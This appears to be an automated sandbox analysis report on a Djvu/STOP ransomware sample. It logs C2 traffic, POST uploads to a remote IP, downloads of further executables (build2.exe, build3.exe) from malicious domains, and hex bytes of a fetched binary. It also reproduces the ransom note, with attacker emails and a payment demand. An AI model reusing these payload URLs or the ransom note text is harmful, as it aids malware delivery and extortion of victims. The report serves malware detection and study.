00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Apr 2024 15:37:35 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.139.220 172.67.139.220
Source: Joe Sandbox View	IP Address: 95.217.9.149 95.217.9.149
Source: Joe Sandbox View	IP Address: 186.13.17.220 186.13.17.220

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TelmexColombiaSACO TelmexColombiaSACO
Source: Joe Sandbox View	ASN Name: TechtelLMDSComunicacionesInteractivasSAAR TechtelLMDSComunicacionesInteractivasSAAR

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGIIDHJEBGIDHJJDBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 5909Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKJEGIEBFHCAAKKEBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 829Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: GET /test1/get.php?pid=3630DD81AC10B7EC98F7204E360B9D7E HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /test1/get.php?pid=3630DD81AC10B7EC98F7204E360B9D7E&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com

Source: R5391762lf.exe, 00000007.00000003.1484423673.00000000097E0000.00000004.00001000.00020000.00000000.sdmp

String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: api.2ip.ua
Source: global traffic	DNS traffic detected: DNS query: sdfjhuz.com
Source: global traffic	DNS traffic detected: DNS query: cajgtus.com
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGIIDHJEBGIDHJJDBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: R5391762lf.exe, 00000007.00000003.2068237141.000000000312E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101155549.000000000312E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe.K5.(
Source: R5391762lf.exe, 00000007.00000003.2068237141.000000000312E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101155549.000000000312E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe0K
Source: R5391762lf.exe, 00000007.00000003.1489131073.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: R5391762lf.exe, 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, R5391762lf.exe, 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: R5391762lf.exe, 00000007.00000003.1484310948.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: R5391762lf.exe, 00000007.00000003.1484368248.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: R5391762lf.exe, 00000007.00000003.1484423673.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: R5391762lf.exe, 00000007.00000003.1503507490.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1486532071.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: R5391762lf.exe, 00000002.00000003.1391033574.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397540119.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: R5391762lf.exe, 00000002.00000003.1391033574.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397540119.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/eQ
Source: R5391762lf.exe, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: R5391762lf.exe, 00000002.00000002.1397540119.0000000000638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonn
Source: R5391762lf.exe, 00000007.00000003.1490848962.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c4429
Source: R5391762lf.exe, 00000007.00000003.1503507490.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1486532071.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com
Source: R5391762lf.exe, 00000007.00000003.1503507490.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1486532071.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets
Source: R5391762lf.exe, 00000007.00000003.1503507490.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1486532071.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
Source: R5391762lf.exe, 00000007.00000003.1491084288.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/generate_204
Source: R5391762lf.exe, 00000007.00000003.1491084288.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/react-native-community/react-native-netinfo
Source: R5391762lf.exe, 00000007.00000003.1488893485.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.66.133.162:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49725 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 2_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,

2_2_004822E0

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\_README.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0863PsawqSdoc0QOgEjKBd9id4JIag7gcdKbtNSaUgho6ODH4e

Jump to dropped file

Yara detected Djvu Ransomware

Source: Yara match	File source: 5.2.R5391762lf.exe.5db15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R5391762lf.exe.5ea15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.R5391762lf.exe.5ec15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1548831250.0000000005DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1792622413.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R5391762lf.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: R5391762lf.exe PID: 7360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: R5391762lf.exe PID: 7500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: R5391762lf.exe PID: 7508, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File moved: C:\Users\user\Desktop\IPKGELNTQY.docx
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File deleted: C:\Users\user\Desktop\IPKGELNTQY.docx
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File moved: C:\Users\user\Desktop\SFPUSAFIOL\ZQIXMVQGAH.pdf
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File deleted: C:\Users\user\Desktop\SFPUSAFIOL\ZQIXMVQGAH.pdf
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File moved: C:\Users\user\Desktop\GRXZDKKVDB.mp3

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d898effa-5251-49be-909e-6a34c1643269}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~cust	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{764e754d-fbdd-43df-9a27-cbb01dbf5078}\appsglobals.txt -> decrypter\dvddecrypter.exe12438{6d809377-6af0-444b-8957-a3773f02200e}\renderdoc\qrenderdoc.exe12438{6d809377-6af0-444b-8957-a3773f02200e}\microsoft system center 2012 r2\service manager\microsoft.enterprisemanagement.servicemanager.ui.console.exe12438microsoft.appv.603b45325cf2a147a217bc0826e85cce12439{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\pro evolution soccer 2018\pes2018.exe12439c:\ignition\ignitioncasino.exe12440{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\splashdata\splashid safe\splashid safe.exe12440{6d809377-6af0-444b-8957-a3773f02200e}\native instruments\komplete kontrol\komplete kontrol.exe1244025342asdf3333.stoppuhrtimer_1xbryz0n7krfa!app12441{6d809377-6af0-444b-8957-a3773f02200e}\owasp\zed attack proxy\zap.exe12441{6d809377-6af0-444b-8957-a3773f02200e}\dell\toad for oracle 2015 r2 suite\toad for oracle 12.8\toad.exe12441{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\mysql\mysql workbench 6.0 ce\mysqlworkbench.exe12441212377tik.7tik-tiktokforwindows_da70t93mgq52j!app12442{7c	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File dropped: C:\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
